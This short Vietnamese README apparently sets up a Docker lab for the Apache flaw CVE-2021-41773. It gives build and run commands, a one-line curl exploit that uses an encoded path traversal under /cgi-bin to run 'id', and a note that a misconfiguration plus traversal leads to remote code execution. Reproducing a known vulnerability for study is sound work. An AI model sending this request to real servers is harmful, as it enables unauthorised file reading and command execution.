cve-2021-41773

Chạy Server

$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773

Khai thác

curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'

Nguyên nhân

Lỗi cấu hình trong file httpd.conf kết hợp Path traversal => RCE
image